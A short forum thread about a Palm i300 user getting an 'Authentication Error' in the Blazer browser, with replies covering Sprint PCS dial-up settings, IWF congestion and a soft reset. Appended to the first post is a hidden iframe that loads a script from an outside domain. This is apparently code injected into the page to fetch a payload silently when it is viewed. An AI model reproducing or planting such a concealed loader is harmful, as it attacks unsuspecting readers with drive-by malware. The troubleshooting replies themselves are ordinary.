    Question Couple of quick questions

Hey guys, I got Blazer onto my i300, and I can't seem to connect to the net. I keep on getting an Authentication Error. Did anyone else experience this problem? And, if yes, how did you combat it? I'm pretty sure my settings are set correctly. Any help would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Are you able to use your Sprint web?

You are probably experiencing one of two potential problems if
you're getting a "Authentication Error" message:

1.) You should be using the Sprint PCS Wireless network connection that dials #2932. The user name and password
    should both be "web".

2.) If you are in an area with high Sprint PCS cellphone density and heavy data network usage, the local IWF may actually run out of available network connections during peak periods.

If this is the case, you can observe the following behavior on the handset:

a.) The handset dials #2932 and goes into "Negotiating" while
    doing the login sequence.
b.) Once the call connects, you'll see a red telephone handset
icon on the icons bar at the top of the display.
c.) If there is no available network connection at the IWF,
during the "Negotiation" phase this icon will disappear,
indicating that the call has been dropped.
d.) The Palm network connection then times out and throws
you the ""Authentication Error" message, because it never
got an "Established" reply on the login operation.

You may want to try setting up an alternate network connection
to dial into your local ISP or corporate network.

I had the same problem myself. I just called technical support and they walked me through the pref settings, after which I had to do a soft reset.
